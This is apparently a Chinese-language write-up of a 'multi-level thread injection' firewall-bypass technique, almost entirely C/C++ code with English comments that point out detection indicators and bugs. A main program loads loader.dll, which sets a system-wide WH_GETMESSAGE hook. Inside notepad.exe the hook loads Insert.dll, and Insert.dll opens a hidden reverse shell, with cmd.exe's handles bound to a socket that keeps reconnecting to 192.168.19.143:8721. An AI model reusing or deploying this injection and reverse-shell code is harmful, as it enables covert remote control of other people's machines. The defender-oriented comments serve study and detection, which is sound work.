多级线程注入穿墙技术

主程序调用loader.dll,运行loader.dll中的sethook安装一个WH_GETMESSAGE的全局钩子,发现notepad进程时,loader.dll在钩子函数中加载Insert.dll,insert.dll会做坏事...

下面仅是一些关键代码，不能运行，后果自负……

1. 主程序代码:

初始化时:

	// TODO: 在此添加额外的初始化代码
	h_Dll = LoadLibrary("loader.dll");
	if (h_Dll == NULL)
	{
		MessageBox("loadlibrary loader.dll error");
		return FALSE;
	}

执行loader.dll中的sethook函数:

typedef void (*LOAD)(HWND);
	LOAD Proc = (LOAD)GetProcAddress(h_Dll, "?SetHook@@YAXPAUHWND__@@@Z");//获得导出函数
	if (Proc == 0)
	{
		MessageBox("Get proc failed");
		return;
	}
	Proc(m_hWnd);//执行导出函数

主程序退出时,卸载钩子:

typedef void(*UNLOAD)(void);
	UNLOAD Proc = (UNLOAD)GetProcAddress(h_Dll, "?UnHook@@YAXXZ");
	if (Proc == 0)
	{
		MessageBox("getproc unhook faild");
		return;
	}
	Proc();
	FreeLibrary(h_Dll);

2. loader.dll

// Hook callback for the WH_GETMESSAGE hook installed by SetHook.
// SetHook passes dwThreadId 0, so the hook is system-wide and this
// function executes inside other message-receiving processes, not just
// the installing program; that is the injection primitive of the write-up.
// From a defender's view the artifact to alert on is a DLL from a
// non-system path registered via SetWindowsHookEx and then observed
// loaded in an unrelated process (here notepad.exe).
// Globals used: hHook (set by SetHook), m_hWnd (set by SetHook), RUN
// (function-pointer typedef declared elsewhere in the DLL).
LRESULT CALLBACK GetMsgProc(int code,WPARAM wParam, LPARAM lParam)
{
	// Pass the message down the hook chain first. The result is discarded;
	// the function returns TRUE unconditionally below.
	CallNextHookEx(hHook,code,wParam,lParam);
	// One-shot flag so Insert.dll is loaded at most once per hooked process.
	static bool old = false;

	// Absolute path of the executable this hook is currently running in.
	char buffer[1000];
	memset(buffer,0,1000);
	GetModuleFileName(NULL,buffer,1000);
	
	// Case-insensitive substring test of the process path against the
	// target name. Both _strdup copies are never freed, so this leaks on
	// every message delivered to every hooked process.
	char *InsertName = _strupr(_strdup("notepad.exe"));
	char *CurrentName = _strupr(_strdup(buffer));
	if (strstr(CurrentName, InsertName) != NULL && old == false)
	{
		// Guard against a second load.
		old	 = true;
		HMODULE hDll = NULL;
		// Second stage is loaded from a hard-coded absolute path from inside
		// a hook procedure; the path string itself and a LoadLibrary call
		// originating in a hook DLL are both detection points.
		hDll = LoadLibrary("c:\\temp\\aa\\Insert.dll");
		// Debug popup — visible to the interactive user of the hooked process.
		MessageBox(NULL,"loader.dll after loadlibrary","ddd",MB_OK);
		if (hDll == NULL)
		{
			MessageBox(NULL, "loadlibrary Insert.dll failed","title",MB_OK);
			return FALSE;
		}
		// Resolve the second stage's entry point by its MSVC-mangled name
		// ("?Run@@YAXPAUHWND__@@@Z" is void Run(HWND)).
		
		// Debug popup.
		MessageBox(NULL,"aaaa","ddd",MB_OK);
		RUN	Run = (RUN)GetProcAddress(hDll, "?Run@@YAXPAUHWND__@@@Z");//?Run@@YAXPAUHWND__@@@Z
		// The GetProcAddress result is called without a NULL check.
		// m_hWnd is the window handle SetHook recorded in the installing
		// process; what value the hooked process sees is not shown here.
		Run(m_hWnd);
	}

	return TRUE;
}


// Exported function: install the hook.
// hWnd is kept in the module global m_hWnd and later handed to Insert.dll's
// Run by GetMsgProc. The final argument 0 (dwThreadId) makes the hook
// system-wide rather than limited to the caller's thread, which is what
// causes loader.dll to be mapped into notepad.exe.
// hinst is presumably loader.dll's own module handle (set elsewhere, not
// shown); hHook is a module global read by GetMsgProc and UnHook.
LOADER_API void SetHook(HWND hWnd)
{
	hHook = NULL;
	m_hWnd = hWnd;
	hHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, hinst,0);
	if (hHook == 0)
	{
		MessageBox(NULL, "setwindowshookEx failed","title",MB_OK);
		return;
	}
}

// Exported function: remove the hook installed by SetHook.
// Uses the module global hHook; it is not reset to NULL afterwards, and
// a failure is only reported through a message box.
LOADER_API void UnHook()
{
	BOOL bRet = UnhookWindowsHookEx(hHook);
	if (bRet != TRUE)
	{
		MessageBox(NULL,"UnhookWindowsHookEx failed","title",MB_OK);
	}
}

3.insert.dll

// Worker thread started by Run inside the hooked process.
// Opens an outbound TCP connection to a hard-coded address/port and
// launches a hidden cmd.exe whose stdin/stdout/stderr are the socket —
// i.e. a reverse shell running under the hooked process. After the shell
// exits it loops forever and reconnects. The while(1) has no exit, so
// WSACleanup() and the return are unreachable.
// Observable indicators on this path: WSAStartup/connect issued by
// notepad.exe, cmd.exe created with bInheritHandles=true, STARTF_USESTDHANDLES
// and SW_HIDE from a process that has no reason to do so, the fixed
// address/port, and the repeated MessageBox popups.
// lParam is unused.
DWORD WINAPI ThreadProc(LPVOID lParam)
{
	// Debug popup.
	MessageBox(NULL,"INSERT.DLL threadProc function..","adf",MB_OK);
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0),&wsa);

	SOCKET sock;
	PROCESS_INFORMATION pi;
	STARTUPINFO si;
	sockaddr_in addr;

	memset(&addr,0,sizeof(addr));
	memset(&pi,0,sizeof(pi));
	memset(&si,0,sizeof(si));

	// Hard-coded remote endpoint.
	addr.sin_family = AF_INET;
	addr.sin_port = htons(8721);
	addr.sin_addr.S_un.S_addr = inet_addr("192.168.19.143");

	// This socket is immediately overwritten at the top of the loop and
	// never closed.
	sock = WSASocket(AF_INET, SOCK_STREAM, NULL, NULL,NULL,NULL);
	// Debug popup ("before the reconnect loop").
	MessageBox(NULL,"INSERT.DLL 断开重连前","adf",MB_OK);
	// Keep reconnecting after every disconnect.
	while (1)
	{
		// Debug popup.
		MessageBox(NULL,"INSERT.DLL while.....","adf",MB_OK);
		sock = WSASocket(AF_INET, SOCK_STREAM, NULL, NULL,NULL,NULL);
		// Retry the connect every 5 s on the same socket handle.
		while (0 != connect(sock, (sockaddr*)&addr, sizeof(addr)))
		{
			shutdown(sock, 0);
			Sleep(5000);
		}
		// Child inherits the socket as all three standard handles and is
		// started hidden.
		si.cb = sizeof(si);
		si.dwFlags = STARTF_USESTDHANDLES |STARTF_USESHOWWINDOW;

		si.hStdInput = si.hStdOutput = si.hStdError = (void*)sock;

		si.wShowWindow = SW_HIDE;
		memset(&pi, 0, sizeof(pi));
		// ret is never checked; on failure pi.hProcess stays NULL.
		BOOL ret = CreateProcess(NULL,"cmd.exe",NULL,NULL,true, 0,NULL,NULL,&si,&pi);
		// Block until the shell exits, then drop the connection and loop.
		WaitForSingleObject(pi.hProcess,INFINITE);
		closesocket(sock);
	}
	// Unreachable: the loop above never terminates.
	WSACleanup();
	return 1;


}

// Exported entry point of Insert.dll, resolved and called by loader.dll's
// GetMsgProc inside the hooked process.
// hWnd is the window handle that loader.dll received from the main program;
// it is sent WM_CLOSE, after which ThreadProc is started on a new thread.
// hThread is a module global (declared elsewhere); the handle is never
// closed or waited on here.
INSERT_API void	Run(HWND hWnd)
{
	// Debug popup.
	MessageBox(NULL,"INSERT.DLL run function..","adf",MB_OK);
	hThread = NULL;
	// The handle from loader.dll is passed in here; send it WM_CLOSE.
	::SendMessageA(hWnd, WM_CLOSE,0, 0);
	hThread = CreateThread(NULL, 0, ThreadProc, NULL,0, NULL);
	if (0 == hThread)
	{
		MessageBox(NULL, "createthread failed","failed",MB_OK);
		return;
	}

}

